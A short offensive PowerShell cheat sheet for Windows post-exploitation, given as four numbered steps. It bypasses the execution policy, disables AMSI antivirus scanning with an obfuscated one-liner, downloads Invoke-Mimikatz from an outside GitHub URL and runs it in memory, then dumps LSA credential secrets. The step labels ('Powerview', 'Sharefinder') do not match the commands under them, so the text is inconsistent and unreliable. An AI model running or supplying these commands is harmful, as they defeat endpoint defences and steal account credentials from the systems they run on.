1. Allow Script Execution
powershell -ep bypass

2. Bypass AMSI
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

3. Download Powerview.ps1 Into Memory
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/RedTeamMagic/Powershell/main/Invoke-Mimikatz.ps1")

4. Run Sharefinder
Invoke-Mimikatz -Command 'lsadump::lsa /patch'
